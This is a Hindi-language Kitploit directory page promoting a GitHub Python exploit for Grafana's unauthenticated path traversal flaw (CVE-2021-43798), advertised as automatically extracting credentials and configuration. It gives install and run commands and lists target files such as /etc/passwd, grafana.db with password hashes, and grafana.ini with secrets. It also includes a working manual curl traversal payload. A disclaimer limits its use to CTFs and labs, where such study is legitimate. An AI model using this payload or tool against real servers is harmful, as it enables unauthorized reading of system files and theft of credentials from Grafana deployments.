Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-Grafana-LFI-CVE-2021-43798 — 📂 Grafana LFI Exploit (CVE-2021-43798). क्रेडेंशियल और कॉन्फ़िगरेशन की स्वचालित निकासी। 🕵️ | Kitploit
उपकरण/GitHubGitHub/kikechans/-grafana-lfi-cve-2021-43798
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंग
GitHubkikechans/-grafana-lfi-cve-2021-43798

-Grafana-LFI-CVE-2021-43798

📂 Grafana LFI Exploit (CVE-2021-43798). क्रेडेंशियल और कॉन्फ़िगरेशन की स्वचालित निकासी। 🕵️

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚀 Grafana LFI Exploit (CVE-2021-43798)

Grafana (8.0.0 से 8.3.0 संस्करणों) में Local File Inclusion (LFI) भेद्यता का शोषण करने के लिए Python 3 स्वचालन स्क्रिप्ट। यह एक्सप्लॉइट बिना प्रमाणीकरण के ऑपरेटिंग सिस्टम की संवेदनशील फ़ाइलों को पढ़ने के लिए directory traversal करने की अनुमति देता है। ✨ विशेषताएँ

root@kitploit:~
Python 3.10+ संगतता: आधुनिक Python संस्करणों के साथ काम करने के लिए पैच किया गया (collections.Mapping का सुधार)।

बैच स्कैनिंग: targets.txt फ़ाइल के माध्यम से कई लक्ष्यों को संसाधित करने की क्षमता।

डेटा डिक्रिप्शन: Grafana के सत्रों और एन्क्रिप्टेड डेटा को संभालने के लिए मॉड्यूल शामिल हैं।

CTF के लिए अनुकूलित: स्वच्छ और सीधा आउटपुट, HackTheBox और TryHackMe जैसे लैब्स के लिए आदर्श।

🛠️ आवश्यकताएँ और इंस्टॉलेशन

पुरानी लाइब्रेरी निर्भरताओं के कारण, निम्नलिखित पैकेज स्थापित करने की अनुशंसा की जाती है: Bash

pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages

root@kitploit:~
नोट: यदि आप Python 3.10 या उससे ऊपर का उपयोग करते हैं, तो स्क्रिप्ट collections.abc के साथ संगतता के लिए एक स्वचालित पैच शामिल करती है।

🚀 उपयोग

root@kitploit:~
लक्ष्य कॉन्फ़िगर करें: targets.txt फ़ाइल में URLs (पोर्ट के साथ) जोड़ें।
Bash

echo "http://10.129.234.47:3000" > targets.txt

एक्सप्लॉइट चलाएँ:
Bash

python3 exploit.py

🎯 सामान्य पठन लक्ष्य (LFI)

एक बार चलाने के बाद, आप निम्न जैसी महत्वपूर्ण फ़ाइलें पढ़ने का प्रयास कर सकते हैं:

root@kitploit:~
/etc/passwd (सिस्टम उपयोगकर्ता) /var/lib/grafana/grafana.db (उपयोगकर्ताओं के हैश वाला डेटाबेस) /etc/grafana/grafana.ini (कॉन्फ़िगरेशन और रहस्य)

💡 वैकल्पिक तरीका (मैनुअल)

यदि आप स्क्रिप्ट का उपयोग नहीं करना चाहते हैं, तो आप curl के माध्यम से सीधे LFI का शोषण कर सकते हैं: Bash

curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

⚠️ अस्वीकरण

यह रिपॉजिटरी विशेष रूप से शैक्षिक उद्देश्यों और नियंत्रित वातावरण (CTFs, लैब्स) में उपयोग के लिए बनाई गई है। लेखक इस उपकरण के दुरुपयोग के लिए ज़िम्मेदार नहीं है। 🏷️ टॉपिक्स (लेबल)

grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal

टूल डाउनलोड करें